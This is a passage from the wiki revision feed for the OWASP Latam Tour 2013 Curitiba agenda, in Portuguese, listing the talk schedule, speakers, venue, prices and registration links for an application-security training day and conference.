| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 19:00 - 19:15&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | Abertura do Evento&lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | Docente da Universidade Positivo&lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | Breve apresentação sobre a instituição&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 19:15 - 20:00&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | OWASP: Quem somos e o que fazemos?&lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | Wagner Elias&lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | Uma visão geral sobre o projeto OWASP e suas principais iniciativas&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 20:00 - 20:45&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | Tendências e Inovações em Segurança de Aplicações&lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | Rafael B. Brinhosa&lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; |20:45 - 21:00&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; |Coffe-Break&lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 21:00 - 21:45&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | Entendendo com funciona um Web Application Firewall&lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | Rodrigo Montoro&lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 21:45 - 22:30&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | Emissão de certificados digitais – a perspectiva do usuário final&lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | Bruno Ribeiro e André Ortiz&lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 22:30 - 23:00&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | Debate&lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | Convidados&lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | Debate e Encerramento do Evento&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=LatamTour2013_CUR_Agenda&amp;diff=147737</id>
		<title>LatamTour2013 CUR Agenda</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=LatamTour2013_CUR_Agenda&amp;diff=147737"/>
				<updated>2013-03-13T00:20:23Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;noinclude&amp;gt;{{:LatamTour2013 header}}&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{|style=&amp;quot;vertical-align:top;width:90%;background-color:#white;padding:10px;border:1px solid silver;&amp;quot; align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;5&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; height=&amp;quot;30&amp;quot; style=&amp;quot;background:#CCCCEE;&amp;quot; colspan=&amp;quot;2&amp;quot;       | '''Treinamento e Conferência''' &lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#EEEEEE;&amp;quot; colspan=&amp;quot;2&amp;quot;                   | &lt;br /&gt;
== '''OWASP Latam Tour - Curitiba 2013''' == &lt;br /&gt;
'''Segunda 25 de Março''' ''(Treinamento 8h - Pago)'' &amp;lt;br&amp;gt;'''Terça 26 de Março''' ''(Conferência - Gratuita)''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;center&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;2&amp;quot;             | '''Descrição e Objetivo'''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;left&amp;quot; height=&amp;quot;80&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; colspan=&amp;quot;2&amp;quot; | '''OWASP LATAM TOUR,''' é um evento que passa pela América Latina promovendo a segurança em aplicações web em várias instituições, tais como universidades, órgãos governamentais, empresas de TI e as instituições financeiras que procuram criar a consciência de segurança em aplicações e pode tomar decisões sobre os verdadeiros riscos de segurança.&lt;br /&gt;
&lt;br /&gt;
* Além do OWASP Top 10, a maioria dos [[:Category:OWASP_Project|Projetos OWASP]] não são amplamente utilizados nos ambientes corporativos. Na maioria dos casos isso não é devido a falta de qualidade nos projetos ou documentação disponível, mas sim aonde se encaixariam em um Ecosistema de Segurança de Aplicações empresarial.&lt;br /&gt;
&lt;br /&gt;
* Este evento tem como objetivo alterar este cenário oferecendo uma explicação de alguns dos projetos OWASP mais maduros e prontos para uso no negócio, além de treinamentos e palestras &lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#CCCCEE;&amp;quot; colspan=&amp;quot;2&amp;quot; | '''Promoção'''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;left&amp;quot; height=&amp;quot;80&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;2&amp;quot; | OFERTA ESPECIAL - Ao longo do OWASP Latam TOUR a taxa de adesão anual é de apenas U$D 20. Use o código de desconto &amp;quot;LATAM&amp;quot; durante o processo de registro de um membro individual do link disponível abaixo.&amp;lt;br&amp;gt;&lt;br /&gt;
[https://www.cvent.com/Events/ContactPortal/Login.aspx?cwstub=15bbcfd1-f49b-4636-ba4e-c9ce70a265e5 Click e seja um membro OWASP] &amp;lt;br&amp;gt;&lt;br /&gt;
'''Se você não é um membro da OWASP, por favor considere fazer parte da nossa organização.'''&lt;br /&gt;
|}&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
{|style=&amp;quot;vertical-align:top;width:90%;background-color:#white;padding:10px;border:1px solid silver;&amp;quot; align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;5&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4B0082;&amp;quot; colspan=&amp;quot;2&amp;quot; | &amp;lt;span style=&amp;quot;color:#ffffff&amp;quot;&amp;gt; '''Treinamento (Segunda 25 de Março)'''&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:20%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Data''' &lt;br /&gt;
| style=&amp;quot;width:80%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Local'''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | ''' Segunda 25 de Março '''&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''UP - Universidade Positivo - Rua Professor Pedro Viriato Parigot de Souza, 5.300 - Campo Comprido - Ctba - PR - Fone: (41) 3317-3000&amp;lt;br&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#CCCCEE;&amp;quot; colspan=&amp;quot;2&amp;quot; | '''Preço e Registro'''&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#EEEEEE;&amp;quot; colspan=&amp;quot;2&amp;quot; | U$S 300 não membro / U$S 250 membro OWASP &amp;lt;br&amp;gt; Para consultar sobre os detalhes do treinamento acesse o seguinte link : &amp;lt;br&amp;gt; '''[https://www.owasp.org/index.php/LatamTour2013#Training Treinamentos - Mais Informações]''' &amp;lt;br&amp;gt; https://www.owasp.org/index.php/LatamTour2013_Training &amp;lt;br&amp;gt;.Para se registrar acesse o seguinte link : &amp;lt;br&amp;gt; '''[http://www.regonline.com/Register/Checkin.aspx?EventId=1212754]''' &amp;lt;br&amp;gt; http://www.regonline.com/Register/Checkin.aspx?EventId=1212754 &amp;lt;br&amp;gt;.&lt;br /&gt;
|}&amp;lt;br&amp;gt;&lt;br /&gt;
{|style=&amp;quot;vertical-align:top;width:90%;background-color:#white;padding:10px;border:1px solid silver;&amp;quot; align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;5&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4B0082;&amp;quot; colspan=&amp;quot;2&amp;quot; | &amp;lt;span style=&amp;quot;color:#ffffff&amp;quot;&amp;gt; &lt;br /&gt;
'''Conferência (Terça - 26 de Março)''' &amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:20%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Fecha''' &lt;br /&gt;
| style=&amp;quot;width:80%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Lugar'''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | ''' Terça 26 de Março '''&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''UP - Universidade Positivo - Rua Professor Pedro Viriato Parigot de Souza, 5.300 - Campo Comprido - Ctba - PR - Fone: (41) 3317-3000&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#CCCCEE;&amp;quot; colspan=&amp;quot;2&amp;quot; | '''Preço e Registro'''&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#EEEEEE;&amp;quot; colspan=&amp;quot;2&amp;quot; | A entrada para o evento é ''' LIVRE &amp;quot;'! Faça o seu registro no seguinte link &amp;lt;br&amp;gt;&lt;br /&gt;
 '''Link de Registro al OWASP LATAM TOUR 2013''': [http://www.regonline.com/Register/Checkin.aspx?EventID=1207610 AQUI!]'''&lt;br /&gt;
|-&lt;br /&gt;
|} &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
{|style=&amp;quot;vertical-align:top;width:90%;background-color:#white;padding:10px;border:1px solid silver;&amp;quot; align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;5&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:90%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;40&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;6&amp;quot; | '''Grade de Palestras'''&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Horário''' &lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Assunto'''&lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Palestrante'''&lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Detalhes'''&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 19:00 - 19:15&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | Abertura do Evento&lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | Docente da Universidade Positivo&lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | Breve apresentação sobre a instituição&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 19:15 - 20:00&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | OWASP: Quem somos e o que fazemos?&lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | Wagner Elias&lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | Uma visão geral sobre o projeto OWASP e suas principais iniciativas&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 20:00 - 20:45&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; |20:45 - 21:00&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; |Coffe-Break&lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 21:00 - 21:45&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 21:45 - 22:30&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 22:30 - 23:00&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | Debate&lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | Convidados&lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | Debate e Encerramento do Evento&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=LatamTour2013_CUR_Agenda&amp;diff=147736</id>
		<title>LatamTour2013 CUR Agenda</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=LatamTour2013_CUR_Agenda&amp;diff=147736"/>
				<updated>2013-03-13T00:12:03Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;noinclude&amp;gt;{{:LatamTour2013 header}}&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{|style=&amp;quot;vertical-align:top;width:90%;background-color:#white;padding:10px;border:1px solid silver;&amp;quot; align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;5&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; height=&amp;quot;30&amp;quot; style=&amp;quot;background:#CCCCEE;&amp;quot; colspan=&amp;quot;2&amp;quot;       | '''Treinamento e Conferência''' &lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#EEEEEE;&amp;quot; colspan=&amp;quot;2&amp;quot;                   | &lt;br /&gt;
== '''OWASP Latam Tour - Curitiba 2013''' == &lt;br /&gt;
'''Segunda 25 de Março''' ''(Treinamento 8h - Pago)'' &amp;lt;br&amp;gt;'''Terça 26 de Março''' ''(Conferência - Gratuita)''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;center&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;2&amp;quot;             | '''Descrição e Objetivo'''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;left&amp;quot; height=&amp;quot;80&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; colspan=&amp;quot;2&amp;quot; | '''OWASP LATAM TOUR,''' é um evento que passa pela América Latina promovendo a segurança em aplicações web em várias instituições, tais como universidades, órgãos governamentais, empresas de TI e as instituições financeiras que procuram criar a consciência de segurança em aplicações e pode tomar decisões sobre os verdadeiros riscos de segurança.&lt;br /&gt;
&lt;br /&gt;
* Além do OWASP Top 10, a maioria dos [[:Category:OWASP_Project|Projetos OWASP]] não são amplamente utilizados nos ambientes corporativos. Na maioria dos casos isso não é devido a falta de qualidade nos projetos ou documentação disponível, mas sim aonde se encaixariam em um Ecosistema de Segurança de Aplicações empresarial.&lt;br /&gt;
&lt;br /&gt;
* Este evento tem como objetivo alterar este cenário oferecendo uma explicação de alguns dos projetos OWASP mais maduros e prontos para uso no negócio, além de treinamentos e palestras &lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#CCCCEE;&amp;quot; colspan=&amp;quot;2&amp;quot; | '''Promoção'''&lt;br /&gt;
|-&lt;br /&gt;
